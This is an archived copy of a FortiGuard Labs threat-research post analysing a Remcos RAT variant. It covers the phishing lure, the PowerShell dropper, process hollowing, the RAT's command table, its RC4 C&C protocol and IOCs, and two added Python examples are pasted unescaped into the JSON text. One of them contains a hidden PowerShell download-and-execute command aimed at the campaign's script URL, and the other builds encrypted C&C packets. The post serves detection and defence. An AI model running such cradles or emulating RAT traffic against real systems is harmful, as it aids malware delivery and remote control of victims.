{
	"id": "eb3ab4b3-4996-468b-a7ac-50a3e802eac4",
	"created_at": "2026-04-06T00:15:10.997059Z",
	"updated_at": "2026-04-10T13:12:25.662218Z",
	"deleted_at": null,
	"sha1_hash": "c928da21de2c44c41f4ec52f07867cbd28564586",
	"title": "New Variant of Remcos RAT Observed In the Wild",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1296404,
	"plain_text": "New Variant of Remcos RAT Observed In the Wild\r\nPublished: 2019-10-21 · Archived: 2026-04-05 13:28:55 UTC\r\nFortiGuard Labs Breaking Threat Analysis\r\nRecently, our LoneWolf Spampot Monitoring System captured several new spam samples. After a quick analysis,\r\nwe identified it is a Remcos RAT campaign. The analysis in this blog focuses on the latest phishing email received\r\nby our system. However, we will include all IoCs related to this campaign at the end of this post.\r\nRemcos RAT is a lightweight, fast and highly customizable Remote Administration Tool with a wide array of\r\nfunctionalities. In past years, it had been observed to act as an information collector, keylogger on a victim’s\r\ndevice. Back to May 2018, we analyzed a variant of it, click here for more details.\r\nFrom an online search, we can see that Remcos is being sold on a website.  Figure 1 is a screenshot of that page.\r\nFigure 1. REMCOS online order page\r\nIn this analysis, we would like to take you to an infected victim’s device, where Remcos was downloaded,\r\ninstalled and executed, to see what this variant does.\r\nPhishing Spam Sample Overview\r\nThe originating message spoofs the email address to appear coming from a valid domain. The attacker also\r\nperforms a Social-Engineering attempt in the shape of a payment advisory email to persuade users to open the\r\nattached ZIP file with the included password.\r\nhttps://www.fortinet.com/blog/threat-research/new-variant-of-remcos-rat-observed-in-the-wild.html\r\nPage 1 of 13\n\nFigure 2. Spam sample\r\nThe attached file is, in reality, a Windows Shortcut (.LNK). The malware author provided the “.TXT” extension as\r\nan attempt to obscure the real file extension once the file is extracted and viewed in the user’s folder.\r\nhttps://www.fortinet.com/blog/threat-research/new-variant-of-remcos-rat-observed-in-the-wild.html\r\nPage 2 of 13\n\nFigure 3. 
ZIP file asking for a password\r\nWhen the user provides the given password and executes the attached file, it fetches a PowerShell script from an\r\nInternet address and executes it.\r\n1\r\nst\r\n Stage Launcher \u0026 Downloader (payment-advice.txt.lnk)\r\nOnce the “payment-advice.txt.lnk” is executed by the victim user, it invokes the PowerShell interpreter\r\n(powershell.exe) with parameters that temporarily bypass the current PowerShell execution policy and then hides\r\nits window to ensure proper execution and hide its presence. The following picture shows the command argument\r\npassed to the PowerShell interpreter.\r\n2nd Stage – Dropper (achremittance.ps1)\r\nThe downloaded PowerShell script “achremittance.ps1” is composed of six functions. The following table\r\ncontains each function name along with its purpose.\r\nOnce the PowerShell script gets to execute, it performs the following actions (in sequential order): \r\n1.     Stores the string “.exe” in a variable encoded in base64, which is eventually decoded and stored in a variable \r\n2.     Generates the absolute path to the newly generated executable (C:\\Users\\Public\\\u003crandom_name\u003e.exe) by\r\nconcatenating the previously received parameter (“.exe” file extension), the system’s public (%PUBLIC%) folder\r\nand a random string generated for the file name. \r\n3.     Decodes a base64 encoded executable file stored in a variable and then writes all bytes into the executable\r\nfile \r\n4.     Performs a file extension check (either .exe OR .dll). This script targets the “.exe” file extension. \r\n5.     Starts the dropped file by calling the “Start-Process” PowerShell cmdlet\r\nhttps://www.fortinet.com/blog/threat-research/new-variant-of-remcos-rat-observed-in-the-wild.html\r\nPage 3 of 13\n\nFigure 4. Base64 encoded Executable file\r\nExecuting the Dropped Remcos\r\nOnce the dropped EXE file executes, it first sleeps for a while (20 seconds) to confront sandboxing.  
Next, on its first run it copies the EXE file to the %LocalAppdata% folder under the name “sysclient.exe”, starts that copy and exits.\r\n“sysclient.exe” then starts a child instance of itself in a suspended state, overwrites the child’s code with the malicious code extracted in the parent, and resumes the child so that the malicious code runs there. This technique is known as process hollowing.\r\nThe figure below shows the process tree when first running the dropped Remcos, where the dropped EXE file is “etyq.exe”.\r\nFigure 5. Process tree when first running the dropped Remcos\r\nThe “sysclient.exe” file is a .NET Framework binary whose code is fully obfuscated, which makes analysis considerably harder. It adds itself to the auto-start group of the system registry so that Remcos starts automatically whenever the victim’s device restarts.\r\nFigure 6 is a screenshot taken when Remcos calls the function that writes to the system registry.\r\nFigure 6. Addition into Auto-Start group of system registry\r\nAnalysis of the Child Process\r\nAccording to our analysis, this variant is version “2.5.0 Pro”, a string hardcoded in the malicious code; that release had only just come out, on September 20, 2019.\r\nLike previous versions, Remcos carries an encrypted resource named “SETTINGS”. After decryption the data looks like Figure 7: an array whose items are separated by the byte 0x1E, highlighted with a red underline.\r\nFigure 7. Decrypted resource “SETTINGS”\r\nThis is the entire configuration data for Remcos. It contains many fields, for example the C\u0026C server host, the license number, the encryption seed used to derive the traffic key, on/off switches for many RAT features (“0” disabled, “1” enabled), the name of its home key in the system registry, and so on.\r\nEach value of the array is fetched by calling a function with its index whenever it is needed.\r\nRemcos runs its keylogger in three threads. The captured keystrokes are saved to a local file at “%Appdata%\\remcos\\logs.dat”. In the previous version logs.dat was encrypted; in this version it is stored in plaintext. The record format is similar to the previous version, as shown in Figure 8: when we opened Chrome, browsed to a website and entered test credentials, everything was recorded.\r\nFigure 8. Example Keylogger logs.dat file content\r\nCommunicating with the C\u0026C Server\r\nTraffic between Remcos and its C\u0026C server is encrypted with RC4. As mentioned above, the “SETTINGS” array holds an encryption seed, “Alibaba123” in this sample, from which the RC4 key used to encrypt and decrypt traffic is generated.\r\nRemcos obtains the C\u0026C server host from index 0 of the decrypted “SETTINGS” array. In Figure 7 you can see the host is “Sub[.]winkcaffe[.]waw[.]pl:10005”. Remcos gathers all the information collected from the victim’s device into a buffer, which is then encrypted and sent to the C\u0026C server.\r\nFigure 9. All collected data from victim’s device\r\nFigure 9 is a screenshot taken just before the buffer is passed to the encryption function.\r\nThe buffer holds an array whose items are separated by the string “|cmd|”. This is the first packet sent to the C\u0026C server; in the screenshot the buffer starts at memory address 0x1845959 and is 0x253 bytes long.\r\n
The four bytes at offset 0x0F are “4B 00 00 00” (0x4B for short), the control command number. In this packet Remcos reports important information from the victim’s device: the user name, location, Windows version, physical memory capacity, Remcos home name and version, the full path of the keylogger log file, the device’s uptime, the path of the Remcos binary, CPU information and so on.\r\nThe C\u0026C server replied to this packet with control command number “01 00 00 00” (0x01 for short), which asks the client to collect the title of the victim’s foreground window and send it back to the server. The decrypted response packet is shown below; its data structure is the same as the one shown in Figure 9.\r\nControl Commands that Remcos Supports\r\nBesides control command 0x01, detailed in the previous section, Remcos supports many more commands that instruct the client to perform tasks on the victim’s device. Because the attacker had not enabled all of them on the server side, we could not observe most of them dynamically; instead we located the command sub-procedures in a single, very large control-command-handler function and analyzed it manually and statically.\r\nIn this section we list most of the control command numbers in a table together with the features they provide.\r\nCmd (hex) | Description\r\n01 | Obtain the victim’s topmost program title. GetForegroundWindow(), GetWindowTextW(), GetTickCount()\r\n03 | Collect information on all installed software, including \"Publisher\", \"DisplayVersion\", \"InstallLocation\", \"InstallDate\", \"UninstallString\".\r\n04 | Download an executable file from a given URL and run it. URLDownloadToFileW(), ShellExecuteW()\r\n05 | Save data from the packet into a local file and execute it. WriteFile(), ShellExecuteW()\r\n06 | Collect information on all running processes. CreateToolhelp32Snapshot(), GetModuleFileNameExW()\r\n07 | Kill a running process by PID. TerminateProcess()\r\n08 | Enumerate all windows and obtain their titles. GetWindowTextW()\r\n09 | Close a window by window handle. CloseWindow()\r\n0A, 0B, AD | Show/hide a window by window handle. ShowWindow()\r\n0C | Obtain the PID owning a given window handle. GetWindowThreadProcessId()\r\n0D | Execute a given command line. _wsystem()\r\n10 | Appears to encode an image as a JPEG stream and send it to the C\u0026C server. SHCreateMemStream(), GdipSaveImageToStream()\r\n11 | Close the socket used by command 10. closesocket()\r\n12 | Collect keyboard layout information. GetKeyboardLayoutName()\r\n13 | Start the online keylogger.\r\n14 | Stop the online keylogger.\r\n15, 16 | Read a local file by path and send it to the C\u0026C server (for example the keylogger logs.dat file).\r\n17 | Delete a given file or directory. DeleteFileW(), RemoveDirectoryW()\r\n18 | Every five seconds, clear the browser history of IE, Firefox and Chrome, so that the victim has to retype what the browser would otherwise fill in and the keylogger can record it.\r\n1B | Connect to a given C\u0026C server to control the victim’s camera.\r\n1C | Close the victim’s camera. CloseCamera()\r\n1D | Record the victim’s voice from the audio input and send it to the C\u0026C server. waveInOpen(), waveInStart()\r\n1E | Stop recording the victim’s voice. waveInStop()\r\n20 | Delete a given file. DeleteFileW()\r\n21 | Exit the Remcos process. exit()\r\n22 | Uninstall Remcos: remove all files and registry keys that Remcos created.\r\n23 | Execute a VBS script, \"restart.vbs\", to restart Remcos. ShellExecuteW()\r\n24, 25 | Update Remcos: download a file from a given URL and execute it through a VBS script, \"update.vbs\". URLDownloadToFileW(), ShellExecuteW()\r\n26 | Show the victim a warning message. MessageBoxW()\r\n27 | Log off the interactive user, shut down, or restart the victim’s system. ExitWindowsEx()\r\n28 | Obtain the victim’s clipboard data. GetClipboardData()\r\n29, 2A | Empty the victim’s clipboard. EmptyClipboard()\r\n2B | Create a shared memory section in the Remcos address space and place data in it. CreateFileMappingA(), MapViewOfFileEx()\r\n2C | Download data from a given URL, create a shared memory section in the Remcos address space and place the downloaded data in it. InternetReadFile(), CreateFileMappingA(), MapViewOfFileEx()\r\n30 | Connect to a given server and communicate with it. DisplayMessage(), GetMessage(), CloseChat()\r\n31 | Save a name/value pair under the Remcos home key (\"HKCU\\Software\\Remcos-CN7LIG\\\") in the system registry.\r\n34 | Perform service control (change service configuration, pause, stop, start) on a specified service and report its status to the C\u0026C server. ChangeServiceConfigW(), ControlService(), StartServiceW()\r\n8F | Enumerate the files in a given directory and send the file names to the C\u0026C server.\r\n92 | Use a given file to set the victim’s desktop wallpaper.\r\n94 | Modify the text of a window by window handle. SetWindowTextW()\r\n95 | Obtain the current physical memory status and report it to the C\u0026C server. GlobalMemoryStatusEx()\r\n98 | Upload/download a file to/from the specified C\u0026C server.\r\n9E, A2 | Play an alarm sound on the victim’s device.\r\nA3 | Play or stop audio on the victim’s device.\r\nAB | Attempt to elevate privileges if the victim’s logon user is not an administrator and report the result to the C\u0026C server.\r\nAC | Can show a pop-up menu to the victim. TrackPopupMenu(), Shell_NotifyIconA()\r\nRemcos can also start a daemon program to protect itself from being killed.\r\n
In the previous version it started a process named “svchost.exe” for this purpose. The attacker in this campaign did not enable the daemon, however: its flag is set to “0” in the “SETTINGS” configuration.\r\nSolution\r\nThe original download URL in the shortcut file is rated as “Malicious Websites” by the FortiGuard Web Filtering service.\r\nThe Shortcut (.lnk) file, the downloaded PowerShell file and the extracted EXE file are all detected and blocked by the FortiGuard Antivirus service.\r\nIOCs:\r\nURLs\r\n[C\u0026C server]\r\nSub[.]winkcaffe[.]waw[.]pl:10005\r\nTop[.]subaroone[.]waw[.]pl:5050\r\n[URL of the PowerShell file]\r\nhxxp[:]//globalpaymentportal[.]co/Admin/Logs/achremittance.ps1\r\nhxxp[:]//transactionportal[.]co/Admin/Logs/transmission.ps1\r\nSample SHA-256\r\n[Shortcut .lnk file]\r\n914F19697F03015BB10AB5FBF96A8BC49F2F8D3C036235233B7CBB0F0E7A902C\r\n0F47E91D77397032192F04FA35980793E400B3589BFAC2919ACC411340B903DE\r\nDA2304FA78FAC37F2F093699BE418553A294FA9F394C1730482B3DDE66DE4CD5\r\n3D03E32E7459ECFC94CA170CC07C54A87C75BACBCD92E5FA15657C46D474B59D\r\n5626AC76C089BA66CC6B6294289A2BD04584F94F35D45198AA65F90E5F6E3EBB\r\n[Downloaded PowerShell file]\r\n55F4B78339A5172A24CA68FFB1D27EE1A791A6AA3821D6D5481B4B02BAED9B48\r\nDF5DA147BCE2A9EDC6226E2EC6F4151AE1CF18C08EDF2C1568FBDD3099CE074A\r\n[Extracted/Dropped EXE file]\r\n55F4B78339A5172A24CA68FFB1D27EE1A791A6AA3821D6D5481B4B02BAED9B48\r\n29FD2DD80F63AA43B34CD7EA2F7AEB9EA5259775233F29CB2205E0279495602D\r\nLearn more about FortiGuard Labs and the FortiGuard Security Services portfolio.
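The first two stages of the chain described above (a .lnk launching a hidden, policy-bypassing PowerShell that downloads a script, the drop into C:\Users\Public, the relocation to %LocalAppdata%\sysclient.exe and the self-spawn used for process hollowing) leave a recognisable trail in process-creation telemetry. The detection logic below is an added example written for this page, not code from the original post or from FortiGuard; it runs over a constructed set of Sysmon-style process events. The PowerShell switches (-ExecutionPolicy Bypass, -WindowStyle Hidden) and the DownloadString cradle in the sample command line are assumptions, since the post shows the real command line only in a screenshot; the PIDs, the user name and the benign admin event are invented for the sample.

```python
"""Detect the Remcos delivery chain from the post in process-creation events.

Added example, not code from the original post or from FortiGuard.  The
PowerShell switches and the download cradle in the sample are assumptions;
the post shows the real command line only in a screenshot."""
import re
from typing import Dict, List, Tuple

# Constructed Sysmon-style (Event ID 1) records, not real telemetry.  PIDs, the
# user name and the benign admin script are invented; the paths, file names and
# the script URL follow the post.
SAMPLE_EVENTS: List[Dict] = [
    {"pid": 4012, "ppid": 1588, "image": r"C:\Windows\explorer.exe",
     "cmdline": "explorer.exe"},
    {"pid": 5240, "ppid": 4012,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": ("powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden "
                 "-Command \"IEX (New-Object Net.WebClient).DownloadString("
                 "'hxxp://globalpaymentportal[.]co/Admin/Logs/achremittance.ps1')\"")},
    {"pid": 5388, "ppid": 5240, "image": r"C:\Users\Public\etyq.exe",
     "cmdline": r"C:\Users\Public\etyq.exe"},
    {"pid": 5512, "ppid": 5388, "image": r"C:\Users\victim\AppData\Local\sysclient.exe",
     "cmdline": r"C:\Users\victim\AppData\Local\sysclient.exe"},
    {"pid": 5600, "ppid": 5512, "image": r"C:\Users\victim\AppData\Local\sysclient.exe",
     "cmdline": r"C:\Users\victim\AppData\Local\sysclient.exe"},
    # Benign: an admin script that bypasses policy but neither hides nor downloads.
    {"pid": 6000, "ppid": 4012,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\backup.ps1"},
]

# Stage 1: the .lnk's PowerShell command line (switch names are assumptions, see above).
PS_BYPASS = re.compile(r"-(?:ExecutionPolicy|ep)\s+Bypass", re.I)
PS_HIDDEN = re.compile(r"-(?:WindowStyle|w)\s+Hidden", re.I)
PS_CRADLE = re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient", re.I)
# Stage 2: executable dropped into the public folder (post: C:\Users\Public\<random>.exe).
PUBLIC_EXE = re.compile(r"^C:\\Users\\Public\\[^\\]+\.exe$", re.I)
# Relocation target (post: %LocalAppdata%\sysclient.exe).
LOCALAPPDATA_EXE = re.compile(r"\\AppData\\Local\\[^\\]+\.exe$", re.I)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def analyze(events: List[Dict]) -> List[Tuple[int, str]]:
    """Return (pid, rule) findings; each rule maps to one step of the chain."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        parent = by_pid.get(e["ppid"])
        name = basename(e["image"])
        parent_name = basename(parent["image"]) if parent else ""
        if name == "powershell.exe":
            hits = [label for label, rx in (("bypass", PS_BYPASS), ("hidden", PS_HIDDEN),
                                            ("cradle", PS_CRADLE)) if rx.search(e["cmdline"])]
            # Require two of three indicators: a bare policy bypass is common in admin scripts.
            if len(hits) >= 2:
                findings.append((e["pid"], "stage1_powershell_launcher:" + "+".join(hits)))
        if PUBLIC_EXE.match(e["image"]) and parent_name == "powershell.exe":
            findings.append((e["pid"], "stage2_public_folder_drop"))
        if LOCALAPPDATA_EXE.search(e["image"]) and parent and PUBLIC_EXE.match(parent["image"]):
            findings.append((e["pid"], "dropper_relocated_to_localappdata"))
        if LOCALAPPDATA_EXE.search(e["image"]) and parent_name == name:
            # Same image spawning itself: the suspended child of process hollowing (Figure 5).
            findings.append((e["pid"], "self_spawn_hollowing_candidate"))
    return findings


def ancestry(events: List[Dict], pid: int) -> List[str]:
    """Image names from the oldest known ancestor down to pid (the tree of Figure 5)."""
    by_pid = {e["pid"]: e for e in events}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(basename(by_pid[pid]["image"]))
        pid = by_pid[pid]["ppid"]
    return chain[::-1]


if __name__ == "__main__":
    for pid, rule in analyze(SAMPLE_EVENTS):
        print(pid, rule, " -> ".join(ancestry(SAMPLE_EVENTS, pid)))
```

The two-of-three threshold on the PowerShell indicators is deliberate: many legitimate scheduled tasks run with an execution-policy bypass, but a bypass combined with a hidden window or a download cradle launched from a user's shell is rarely benign. On real Sysmon data the `image`, `ppid` and `cmdline` fields map directly onto Event ID 1's Image, ParentProcessId and CommandLine.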
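The configuration and C&C traffic format described above (the 0x1E-separated SETTINGS array with the C&C host at index 0, RC4-encrypted packets, the 4-byte command number at offset 0x0F and the |cmd|-separated fields) can be handled with a small parser. The block below is an added example written for this page, not code from the original post or from Remcos itself. Two things are assumptions: the seed is used directly as the RC4 key (the post only says the key is generated from it), and the 15 bytes in front of the command number are treated as an opaque header. The SETTINGS blob, the position of the seed inside it and the beacon fields are constructed; only the host, the seed “Alibaba123”, the version string and the home key name come from the post.

```python
"""Parse Remcos "SETTINGS" data and C&C packets as described in the post.

Added example, not code from the original post or from Remcos.  Assumptions:
the seed is used directly as the RC4 key (the post only says the key is
generated from it), and the 15 bytes before the command number are an opaque
header here."""
from typing import List, Tuple

SEP_SETTINGS = b"\x1e"      # item separator in the decrypted SETTINGS resource (Figure 7)
SEP_FIELD = b"|cmd|"        # item separator inside a C&C packet (Figure 9)
CMD_OFFSET = 0x0F           # 4-byte little-endian control command number (post)
HEADER_LEN = CMD_OFFSET + 4

# The two command numbers the post walks through; its table lists the rest.
COMMANDS = {0x01: "send foreground window title", 0x4B: "initial beacon with host information"}


def rc4(key: bytes, data: bytes) -> bytes:
    """Textbook RC4 (KSA + PRGA); the same call encrypts and decrypts."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def parse_settings(blob: bytes) -> List[str]:
    """Split the decrypted SETTINGS resource on 0x1E; index i is what the RAT fetches by i."""
    return [item.decode("latin-1") for item in blob.split(SEP_SETTINGS)]


def c2_endpoint(settings: List[str]) -> Tuple[str, int]:
    """Index 0 of SETTINGS is the C&C host:port (post)."""
    host, port = settings[0].rsplit(":", 1)
    return host, int(port)


def build_packet(cmd: int, fields: List[str], header: bytes = b"\x00" * CMD_OFFSET) -> bytes:
    """Opaque header (assumption), little-endian command number, |cmd|-joined fields."""
    if len(header) != CMD_OFFSET:
        raise ValueError("header must be exactly CMD_OFFSET bytes")
    body = SEP_FIELD.join(f.encode("latin-1") for f in fields)
    return header + cmd.to_bytes(4, "little") + body


def parse_packet(plain: bytes) -> Tuple[int, List[str]]:
    """Inverse of build_packet on an already RC4-decrypted packet."""
    if len(plain) < HEADER_LEN:
        raise ValueError("packet shorter than header")
    cmd = int.from_bytes(plain[CMD_OFFSET:HEADER_LEN], "little")
    body = plain[HEADER_LEN:]
    fields = [f.decode("latin-1") for f in body.split(SEP_FIELD)] if body else []
    return cmd, fields


# Constructed SETTINGS blob: the host and the seed are values from the post, their
# order and the remaining items are placeholders chosen for this example.
SAMPLE_SETTINGS = SEP_SETTINGS.join(
    [b"Sub[.]winkcaffe[.]waw[.]pl:10005", b"Alibaba123", b"Remcos-CN7LIG", b"0", b"1"])
SEED_INDEX = 1  # position of the seed in the constructed blob above

# Constructed beacon content following the field list in the post (user name,
# location, Windows version, memory, home name, version, log path, ...).
BEACON_FIELDS = ["VICTIM-PC\\victim", "US", "Windows 10 Pro", "8192 MB", "Remcos-CN7LIG",
                 "2.5.0 Pro", r"C:\Users\victim\AppData\Roaming\remcos\logs.dat"]


def simulate_exchange() -> dict:
    """Client beacon (0x4B) and server reply (0x01), RC4-encrypted on the wire and decoded again."""
    settings = parse_settings(SAMPLE_SETTINGS)
    key = settings[SEED_INDEX].encode("latin-1")   # seed used directly as key (assumption)
    host, port = c2_endpoint(settings)
    wire_beacon = rc4(key, build_packet(0x4B, BEACON_FIELDS))
    wire_reply = rc4(key, build_packet(0x01, []))
    beacon_cmd, beacon_fields = parse_packet(rc4(key, wire_beacon))
    reply_cmd, _ = parse_packet(rc4(key, wire_reply))
    return {"c2": (host, port), "beacon_cmd": beacon_cmd, "beacon_fields": beacon_fields,
            "reply_cmd": reply_cmd, "reply_meaning": COMMANDS.get(reply_cmd, "unknown")}


if __name__ == "__main__":
    for k, v in simulate_exchange().items():
        print(f"{k}: {v}")
```

Against a real sample the same two entry points apply: feed the decrypted SETTINGS resource to parse_settings() and each RC4-decrypted TCP payload to parse_packet(); if the command number does not land at offset 0x0F in a newer build, CMD_OFFSET is the only constant to adjust.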
\r\nRead about the FortiGuard Security Rating Service, which provides security audits and best practices.\r\nSource: https://www.fortinet.com/blog/threat-research/new-variant-of-remcos-rat-observed-in-the-wild.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.fortinet.com/blog/threat-research/new-variant-of-remcos-rat-observed-in-the-wild.html"
	],
	"report_names": [
		"new-variant-of-remcos-rat-observed-in-the-wild.html"
	],
	"threat_actors": [],
	"ts_created_at": 1775434510,
	"ts_updated_at": 1775826745,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/c928da21de2c44c41f4ec52f07867cbd28564586.pdf",
		"text": "https://archive.orkl.eu/c928da21de2c44c41f4ec52f07867cbd28564586.txt",
		"img": "https://archive.orkl.eu/c928da21de2c44c41f4ec52f07867cbd28564586.jpg"
	}
}